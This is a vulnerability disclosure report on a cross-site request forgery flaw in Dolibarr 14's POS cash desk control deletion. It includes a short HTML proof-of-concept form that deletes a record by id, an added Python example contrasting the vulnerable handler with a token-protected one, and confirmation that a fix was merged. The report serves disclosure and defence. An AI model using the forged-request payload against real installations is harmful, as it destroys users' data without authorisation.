Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr


Reported on Jul 21st 2021

✍️ Description

In the Bank section, in the POS part, you don't protect resources from deletion against CSRF attacks, and so I was able to delete/close arbitrary POS cash desk control entities only by knowing their ids.

🕵️‍♂️ Proof of Concept

// PoC.html

<script>history.pushState('', '', '/')</script>
<form action="">
  <input type="hidden" name="id" value="4" />
  <input type="hidden" name="action" value="confirm&#95;delete" />
  <input type="submit" value="Submit request" />
</form>
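The PoC works because the delete endpoint accepts a method-less form (which submits as GET) carrying only `id` and `action`, with nothing that binds the request to the victim's session. The following is an added example, not Dolibarr's code and not part of the report: it models the unprotected handler beside a hardened one using the synchronizer-token pattern, with a POST-only rule and an Origin/Referer check as defence in depth. `Request`, `CashControlStore`, `issue_token` and the `erp.example.test` origin are constructed names for the illustration; the record ids and the forged request are sample values.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Request:
    """Minimal stand-in for an inbound HTTP request (constructed for this example)."""
    method: str
    params: dict
    headers: dict = field(default_factory=dict)


class CashControlStore:
    """In-memory stand-in for POS cash desk control records (not Dolibarr's model)."""

    def __init__(self, ids):
        self.records = set(ids)

    def delete(self, rec_id: int) -> None:
        self.records.discard(rec_id)


def handle_delete_unprotected(req: Request, store: CashControlStore) -> str:
    """Shape of the reported flaw: any request carrying id + action=confirm_delete
    is honoured, whatever its method, origin or session binding. A GET form hosted
    on a third-party page is therefore enough to delete a record."""
    if req.params.get("action") == "confirm_delete":
        store.delete(int(req.params["id"]))
        return "deleted"
    return "ignored"


def issue_token(session: dict) -> str:
    """Generate a per-session anti-CSRF token when the page with the delete button
    is rendered; the server-rendered form embeds it as a hidden 'token' field."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def _same_site(origin_header: str, trusted_origin: str) -> bool:
    """Compare only scheme and host, so both an Origin value and a full Referer URL work."""
    parts = urlsplit(origin_header)
    return f"{parts.scheme}://{parts.netloc}" == trusted_origin


def handle_delete_protected(req: Request, session: dict, store: CashControlStore,
                            trusted_origin: str = "https://erp.example.test") -> str:
    """Hardened handler: three independent checks before the destructive action."""
    # 1. State-changing actions must not be reachable via GET; a plain link or a
    #    method-less <form> (which submits as GET) is rejected outright.
    if req.method != "POST":
        return "rejected: state change requires POST"

    # 2. Synchronizer token: the hidden field must equal the value bound to this
    #    session. An attacker's page cannot read it (same-origin policy), so a
    #    forged form cannot carry it. Compare in constant time on bytes.
    expected = session.get("csrf_token", "")
    supplied = req.params.get("token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected: missing or invalid CSRF token"

    # 3. Defence in depth: if the browser sent Origin or Referer, it must be ours.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin and not _same_site(origin, trusted_origin):
        return "rejected: cross-site origin"

    if req.params.get("action") == "confirm_delete":
        store.delete(int(req.params["id"]))
        return "deleted"
    return "ignored"


if __name__ == "__main__":
    # Constructed forged request: the PoC form, submitted from the attacker's page.
    forged = Request("GET", {"id": "4", "action": "confirm_delete"},
                     {"Referer": "https://attacker.example/PoC.html"})
    store = CashControlStore([3, 4, 5])
    print("unprotected:", handle_delete_unprotected(forged, store), store.records)
    store = CashControlStore([3, 4, 5])
    session = {}
    print("protected, forged:", handle_delete_protected(forged, session, store), store.records)
    token = issue_token(session)
    legit = Request("POST", {"id": "4", "action": "confirm_delete", "token": token},
                    {"Origin": "https://erp.example.test"})
    print("protected, legit:", handle_delete_protected(legit, session, store), store.records)
```

Running the module shows the forged GET deleting record 4 in the unprotected handler and being rejected by the protected one, while a same-origin POST carrying the session token still succeeds. The token check is the control that actually closes the CSRF; the POST-only and Origin rules catch sloppy clients and give a second line of defence if a token ever leaks into a URL or log.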

💥 Impact

This vulnerability is capable of deleting the mentioned POS entities from the Bank section. Version of application == 14 (tested on demo website)

We have contacted a member of the dolibarr team and are waiting to hear back a year ago
Laurent Destailleur confirmed that a fix has been merged on 6390f2 a year ago
Laurent Destailleur has been awarded the fix bounty